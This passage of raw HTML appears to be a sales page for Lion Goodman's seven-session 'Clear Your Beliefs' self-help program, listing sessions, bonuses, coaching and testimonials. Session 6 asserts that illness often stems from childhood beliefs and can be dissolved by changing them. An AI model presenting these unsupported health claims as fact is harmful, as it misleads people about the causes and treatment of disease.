src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><FONT COLOR="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div 